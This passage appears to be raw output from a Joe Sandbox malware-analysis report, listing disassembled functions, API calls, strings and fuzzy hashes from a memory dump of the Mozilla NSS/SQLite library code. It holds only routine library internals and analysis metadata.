Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 3bdefce8d04e86ecf628d8715d95f543b6256dfef275566b9332fa5acbcfcad5
Instruction ID: 244d53fa2a0b001cae45e19898ca866033879c4594d7afcf166cfa7f2057d7b5
Opcode Fuzzy Hash: 3bdefce8d04e86ecf628d8715d95f543b6256dfef275566b9332fa5acbcfcad5
Instruction Fuzzy Hash: 7D4159B4A04A15CFCB00EF78D1858AABBF0FF49354B058669EC599B710EB30E895CBD1

Function 6CA7DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CA7DCFA

Part of subcall function 6CB39DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB80A27), ref: 6CB39DC6
Part of subcall function 6CB39DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB80A27), ref: 6CB39DD1
Part of subcall function 6CB39DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB39DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA7DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CA7DD62
CERT_DestroyCertificate.NSS3(?), ref: 6CA7DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6CA7DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6CA7DD8F

Part of subcall function 6CA906A0: TlsGetValue.KERNEL32 ref: 6CA906C2
Part of subcall function 6CA906A0: EnterCriticalSection.KERNEL32(?), ref: 6CA906D6
Part of subcall function 6CA906A0: PR_Unlock.NSS3 ref: 6CA906EB

CERT_DestroyCertificate.NSS3(?), ref: 6CA7DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6CA7DDB7

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 4a0e2e6da004edd7484581cf5886044878039b0dad165e20ccedd468f38d7079
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: 5A2180BAE021259BDF119FA4DE409DE77B4BF05218B180025E918A7702F721E998CBF1

Function 6CB80860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6CB87AE2,?,?,?,?,?,?,6CB8798A), ref: 6CB8086C

Part of subcall function 6CB80930: EnterCriticalSection.KERNEL32(?,00000000,?,6CB80C83), ref: 6CB8094F
Part of subcall function 6CB80930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6CB80C83), ref: 6CB80974
Part of subcall function 6CB80930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80983
Part of subcall function 6CB80930: _PR_MD_UNLOCK.NSS3(?,?,6CB80C83), ref: 6CB8099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6CB87AE2,?,?,?,?,?,?,6CB8798A), ref: 6CB8087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6CB87AE2,?,?,?,?,?,?,6CB8798A), ref: 6CB80892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6CB8798A), ref: 6CB808AA
free.MOZGLUE(?,00000000,00000000,?,?,6CB87AE2,?,?,?,?,?,?,6CB8798A), ref: 6CB808C7
free.MOZGLUE(?,00000000,00000000,?,?,6CB87AE2,?,?,?,?,?,?,6CB8798A), ref: 6CB808E9
free.MOZGLUE(?,6CB87AE2,?,?,?,?,?,?,6CB8798A), ref: 6CB808EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6CB87AE2,?,?,?,?,?,?,6CB8798A), ref: 6CB8090E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: 5fb1aad0d6518c7a659908fb5a49d23664376035818281c03c642a89f9fffca7
Instruction ID: 9a1b70b83a6db392a2907d06b8dcab980177663b22bf99c74245f1a3037f7966
Opcode Fuzzy Hash: 5fb1aad0d6518c7a659908fb5a49d23664376035818281c03c642a89f9fffca7
Instruction Fuzzy Hash: A51182B1B036904BFF00AB99E86574A3778EB463A9F1D0124F81697641DB31F954CBD2

Function 6CA73C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6CAE460B,?,?), ref: 6CA73CA9
EnterCriticalSection.KERNEL32(?), ref: 6CA73CB9
PL_HashTableLookup.NSS3(?), ref: 6CA73CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6CA73CD6
PR_Unlock.NSS3 ref: 6CA73CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CA73CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA73D03
PR_Unlock.NSS3 ref: 6CA73D15

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: f96a7ae87b37a4dc500bc94d79493337c0c4f71b6f5677393410a790e42bb611
Instruction ID: 01d3ea3df57bbf05ce716eb70cbfe65b723b6280520476b9c1c98ce9d89c02d6
Opcode Fuzzy Hash: f96a7ae87b37a4dc500bc94d79493337c0c4f71b6f5677393410a790e42bb611
Instruction Fuzzy Hash: 81112C7EE425146BDB111A34AD058AA7B7CFB0225CB1A4530ED1843B12F722DD9C86E1

Function 6CAF8D20 Relevance: 10.8, APIs: 7, Instructions: 290memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD002,00000000), ref: 6CAF8E19
free.MOZGLUE(?), ref: 6CAF8E2D
PORT_Alloc_Util.NSS3(?), ref: 6CAF8F01
memcpy.VCRUNTIME140(?,?,?), ref: 6CAF8F57
free.MOZGLUE(?), ref: 6CAF8F7D
PR_GetCurrentThread.NSS3 ref: 6CAF8F8A
PR_SetError.NSS3(FFFFD044,00000000), ref: 6CAF90D6

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
String ID:
API String ID: 4163001165-0
Opcode ID: 54cfc5d5ba2eb775677560099121d07201f6232090eb1df6483101a52370352f
Instruction ID: 4b5477a155f9f8859e7f10f4cf26e37cd379247c13bbe1a8ecf6196b30a7f858
Opcode Fuzzy Hash: 54cfc5d5ba2eb775677560099121d07201f6232090eb1df6483101a52370352f
Instruction Fuzzy Hash: 21A1D671A047019BE710CF26C941BAA73F5EF59308F08492DF9A9CB752E731E689C792

Function 6CAE8C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAE8C93

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

Part of subcall function 6CAC8A60: TlsGetValue.KERNEL32(6CA761C4,?,6CA75F9C,00000000), ref: 6CAC8A81
Part of subcall function 6CAC8A60: TlsGetValue.KERNEL32(?,?,?,6CA75F9C,00000000), ref: 6CAC8A9E
Part of subcall function 6CAC8A60: EnterCriticalSection.KERNEL32(?,?,?,?,6CA75F9C,00000000), ref: 6CAC8AB7
Part of subcall function 6CAC8A60: PR_Unlock.NSS3(?,?,?,?,?,6CA75F9C,00000000), ref: 6CAC8AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6CAE8CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6CAE8D10

Part of subcall function 6CAC8970: TlsGetValue.KERNEL32(?,00000000,6CA761C4,?,6CA75639,00000000), ref: 6CAC8991
Part of subcall function 6CAC8970: TlsGetValue.KERNEL32(?,?,?,?,?,6CA75639,00000000), ref: 6CAC89AD
Part of subcall function 6CAC8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA75639,00000000), ref: 6CAC89C6
Part of subcall function 6CAC8970: PR_WaitCondVar.NSS3 ref: 6CAC89F7
Part of subcall function 6CAC8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA75639,00000000), ref: 6CAC8A0C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: 04581ccef57690d39a78818f6bb29b4b848e9e296aa24e194a82662d2c40ca63
Instruction ID: d1257cdb57f59c521312b761c3d58acf14ef2ad1495e945260e638fb101d5b11
Opcode Fuzzy Hash: 04581ccef57690d39a78818f6bb29b4b848e9e296aa24e194a82662d2c40ca63
Instruction Fuzzy Hash: 6FB194B0D003089FDB15CF69DD80AAEB7BAFF48308F14412ED81AA7751E731A995DB91

Function 6CA79C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA911C0: PR_NewLock.NSS3 ref: 6CA91216

free.MOZGLUE(?), ref: 6CA79E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA79E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA79E4E
TlsGetValue.KERNEL32 ref: 6CA79EA2

Part of subcall function 6CA89500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CA89546

EnterCriticalSection.KERNEL32(?), ref: 6CA79EB6
PR_Unlock.NSS3 ref: 6CA79ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CA79F18

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 1f9b7bfc48793212e7711b827879c487ef8e9723efd58e3397b8a1ebc3f28e26
Instruction ID: b4b68ab22fb5e574b48c6cbaa504e93d577acb560dc0b3bd0f0aac3a5c299bc8
Opcode Fuzzy Hash: 1f9b7bfc48793212e7711b827879c487ef8e9723efd58e3397b8a1ebc3f28e26
Instruction Fuzzy Hash: E3811979A01701ABEB109F34DE41AAB77B9FF45248F084529EC4987B41FB31E998C7A1

Function 6CA8DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA8AB10: DeleteCriticalSection.KERNEL32(D958E852,6CA91397,5B5F5EC0,?,?,6CA8B1EE,2404110F,?,?), ref: 6CA8AB3C
Part of subcall function 6CA8AB10: free.MOZGLUE(D958E836,?,6CA8B1EE,2404110F,?,?), ref: 6CA8AB49
Part of subcall function 6CA8AB10: DeleteCriticalSection.KERNEL32(5D5E6CC8), ref: 6CA8AB5C
Part of subcall function 6CA8AB10: free.MOZGLUE(5D5E6CBC), ref: 6CA8AB63
Part of subcall function 6CA8AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CA8AB6F
Part of subcall function 6CA8AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CA8AB76

TlsGetValue.KERNEL32 ref: 6CA8DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6CA8DD0E
PK11_IsFriendly.NSS3(?), ref: 6CA8DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CA8DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA8DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA8DEA6
PR_Unlock.NSS3(?), ref: 6CA8DF08

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: 3c318ec5383db0c0c062427a95f78449a8df73b94a15149b64af5a2ebef2a504
Instruction ID: 520dfdd88409ff5e4b4d611a75059c79966e86bfda589452dbb5302d6da693ff
Opcode Fuzzy Hash: 3c318ec5383db0c0c062427a95f78449a8df73b94a15149b64af5a2ebef2a504
Instruction Fuzzy Hash: 5991C4B5E021069FDB00CF68D981BAAB7B5BF54308F18402ADD199B741EB31ED95CBA1

Function 6CAEDE70 Relevance: 10.7, APIs: 7, Instructions: 224COMMON

Download Yara Rule

APIs

SECITEM_CompareItem_Util.NSS3(FFFFD064,?), ref: 6CAEDFB9
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CAEE029

Part of subcall function 6CAC8970: TlsGetValue.KERNEL32(?,00000000,6CA761C4,?,6CA75639,00000000), ref: 6CAC8991
Part of subcall function 6CAC8970: TlsGetValue.KERNEL32(?,?,?,?,?,6CA75639,00000000), ref: 6CAC89AD
Part of subcall function 6CAC8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA75639,00000000), ref: 6CAC89C6
Part of subcall function 6CAC8970: PR_WaitCondVar.NSS3 ref: 6CAC89F7
Part of subcall function 6CAC8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA75639,00000000), ref: 6CAC8A0C

PR_SetError.NSS3(FFFFD06A,00000000), ref: 6CAEE072
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAEE098
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAEE0A7
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAEE0F1
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAEE10A

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Item_Util$CompareCopyValueZfree$CondCriticalEnterErrorSectionUnlockWait
String ID:
API String ID: 1854523011-0
Opcode ID: 2010bb05e96f040df714f8917b4aa973ec48bd5ce481a77306bface4f468b593
Instruction ID: 137f83a77a6b022b686e0ebb99407820370cf4e8ba57db74f0be0e55ccfe6dbd
Opcode Fuzzy Hash: 2010bb05e96f040df714f8917b4aa973ec48bd5ce481a77306bface4f468b593
Instruction Fuzzy Hash: 57812375A05711ABE7109B24DD40B9AB7B4BF48318F084229ED1993B91E731A9ECDBC2

Function 6C9F4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9F4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9F51BB

Strings

misuse, xrefs: 6C9F51AF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9F51A5
unable to delete/modify user-function due to active statements, xrefs: 6C9F51DF
%s at line %d of [%.10s], xrefs: 6C9F51B4

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 4b6e16a4cbe3a18e50741ec313f1ed4992a398ffdafb871244567c7a2d8f78fc
Instruction ID: dafc330470a59e60b444e9fb9e25930757e8aa31ce6fc9bff414b023aecf1635
Opcode Fuzzy Hash: 4b6e16a4cbe3a18e50741ec313f1ed4992a398ffdafb871244567c7a2d8f78fc
Instruction Fuzzy Hash: 6071BFB5B0420ADFEB00CE55CD80B9A77B9BF48318F088524FD299BB45D731E952CBA1

Function 6CA62D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CA62D69

Strings

winTruncate1, xrefs: 6CA62EBE
winUnmapfile1, xrefs: 6CA62F55
winUnmapfile2, xrefs: 6CA62F7F
winSeekFile, xrefs: 6CA62E9C
winTruncate2, xrefs: 6CA62EF8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: e050fe30f5614f68e2acf310dee214c51a509839098fcaa31a85aa3ac2caa2d8
Instruction ID: 5ab1ae65d4a5d0b0ab1f64e70583c8de90fd0aea6fa0864060936aaccace7f8b
Opcode Fuzzy Hash: e050fe30f5614f68e2acf310dee214c51a509839098fcaa31a85aa3ac2caa2d8
Instruction Fuzzy Hash: C161AE75A00205DFDB04CF69DC94AAE7BB5FF49314F148238E919ABB80DB31AD46CB91

Function 6CA9DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA9DF37
EnterCriticalSection.KERNEL32(?), ref: 6CA9DF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA9DF96
PR_SetError.NSS3(00000000,00000000), ref: 6CA9E02B
PR_Unlock.NSS3(?), ref: 6CA9E07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA9E090
PR_Unlock.NSS3(?), ref: 6CA9E0AF

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: e7f65bddb5e7e3aafa8e488e54816660b35c94df55903cce46e40668af9227d0
Instruction ID: a2671b506c2fc293a5453b54dd44c5ed88bfa91059e7c945f568e979ebd6d044
Opcode Fuzzy Hash: e7f65bddb5e7e3aafa8e488e54816660b35c94df55903cce46e40668af9227d0
Instruction Fuzzy Hash: 1651AF35A506009FEB209F28D846B6A73F5FF44318F244928E95A47F92D735E9C8CBD2

Function 6CA9BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CA9BD1E

Part of subcall function 6CA72F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA72F0A
Part of subcall function 6CA72F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA72F1D

Part of subcall function 6CAB57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA7B41E,00000000,00000000,?,00000000,?,6CA7B41E,00000000,00000000,00000001,?), ref: 6CAB57E0
